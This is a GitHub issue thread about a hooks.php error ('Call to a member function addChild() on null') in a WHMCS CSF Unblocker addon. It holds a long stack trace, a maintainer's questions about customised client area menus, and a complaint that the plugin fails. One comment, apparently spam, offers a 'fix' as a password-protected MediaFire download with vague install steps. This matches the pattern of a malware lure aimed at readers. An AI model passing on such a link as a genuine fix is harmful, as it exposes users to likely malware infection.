### ISSUE TITLE
Hooks error when Module trying to add Menu item - Custom Menu in-use?

### ISSUE THREAD

**Issue by madmanwilber** [The-Network-Crew/CSF-Unblocker-for-WHMCS#4]
Hooks file has errors when logging into users accounts

`Error: Call to a member function addChild() on null in ~/public_html/modules/addons/unblockip/hooks.php:180`

![1](https://github.com/user-attachments/assets/31557110-f694-4868-8220-0d58a20fe3b3)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by lsthompson** [comment]
Do you have any customisations to your Client Area menu?

ie. Is the parent entry "Support" called something else?

**Comment by abkrim** [comment]
Hi yes for me. I use ThemeMetro.

Apreciate your help, before continue.

```php
Firewall Unblocker   Oops!
Something went wrong and we couldn't process your request.
Please go back to the previous page and try again.
 Error: Call to a member function addChild() on null in /home/intranet/web/intranet.domain.tld/public_html/modules/addons/unblockip/hooks.php:180 Stack trace: #0 [internal function]: WHMCS\Utility\SafeInclude::{closure}() #1 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Hook/Manager.php(0): call_user_func() #2 /home/intranet/web/intranet.domain.tld/public_html/vendor/illuminate/support/Facades/Facade.php(261): WHMCS\Hook\Manager->run() #3 /home/intranet/web/intranet.domain.tld/public_html/includes/functions.php(0): Illuminate\Support\Facades\Facade::__callStatic() #4 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/ClientArea.php(0): run_hook() #5 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/ClientArea.php(0): WHMCS\ClientArea->outputWithoutExit() #6 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Http/Message/AbstractViewableResponse.php(0): WHMCS\ClientArea->getOutputContent() #7 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/CallableHandler.php(39): WHMCS\Http\Message\AbstractViewableResponse->getBody() #8 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/fast-route/src/FastRoute.php(96): Middlewares\Utils\CallableHandler::execute() #9 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/HandleProcessor.php(0): Middlewares\FastRoute->process() #10 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\HandleProcessor->_process() #11 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\HandleProcessor->process() #12 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #13 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #14 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/AbstractProxyMiddleware.php(0): Middlewares\Utils\Delegate->process() #15 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\AbstractProxyMiddleware->_process() #16 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\AbstractProxyMiddleware->process() #17 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #18 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #19 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/AbstractProxyMiddleware.php(0): Middlewares\Utils\Delegate->process() #20 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\AbstractProxyMiddleware->_process() #21 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\AbstractProxyMiddleware->process() #22 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #23 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #24 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/BackendPsr7Response.php(0): Middlewares\Utils\Delegate->process() #25 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/BackendPsr7Response.php(0): WHMCS\Route\Middleware\BackendPsr7Response->_process() #26 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\BackendPsr7Response->process() #27 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #28 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #29 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(56): Middlewares\Utils\Delegate->process() #30 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/BackendDispatch.php(0): Middlewares\Utils\Dispatcher->dispatch() #31 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\BackendDispatch->_process() #32 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\BackendDispatch->process() #33 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #34 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #35 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/RoutePathMatch.php(0): Middlewares\Utils\Delegate->process() #36 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\RoutePathMatch->_process() #37 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\RoutePathMatch->process() #38 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #39 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #40 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/WhitelistFilter.php(0): Middlewares\Utils\Delegate->process() #41 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/DelegatingMiddlewareTrait.php(0): WHMCS\Route\Middleware\WhitelistFilter->_process() #42 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\WhitelistFilter->process() #43 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #44 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #45 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/RoutableClientModuleRequest.php(0): Middlewares\Utils\Delegate->process() #46 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\RoutableClientModuleRequest->_process() #47 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\RoutableClientModuleRequest->process() #48 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #49 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #50 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/RoutableAdminRequestUri.php(0): Middlewares\Utils\Delegate->process() #51 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\RoutableAdminRequestUri->_process() #52 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\RoutableAdminRequestUri->process() #53 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #54 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #55 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/RoutableRequestUri.php(0): Middlewares\Utils\Delegate->process() #56 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\RoutableRequestUri->_process() #57 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\RoutableRequestUri->process() #58 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #59 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #60 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/RoutableRequestQueryUri.php(0): Middlewares\Utils\Delegate->process() #61 /home/intranet/web/intranet.domain.tld/public_html/vendor/whmcs/whmcs-foundation/lib/Route/Middleware/Strategy/AssumingMiddlewareTrait.php(0): WHMCS\Route\Middleware\RoutableRequestQueryUri->_process() #62 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(76): WHMCS\Route\Middleware\RoutableRequestQueryUri->process() #63 [internal function]: Middlewares\Utils\Dispatcher->Middlewares\Utils\{closure}() #64 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Delegate.php(31): call_user_func() #65 /home/intranet/web/intranet.domain.tld/public_html/vendor/middlewares/utils/src/Dispatcher.php(56): Middlewares\Utils\Delegate->process() #66 /home/intranet/web/intranet.domain.tld/public_html/index.php(0): Middlewares\Utils\Dispatcher->dispatch()

```

**Comment by lsthompson** [comment]
Please send a screenshot of your Client Area menu for Support?

**Comment by quietvw** [comment]
This plugin doesn't work.

I am using the root account in cPanel. The API this plugin uses is out of date it seems. The debug log just shows the WHM login page.
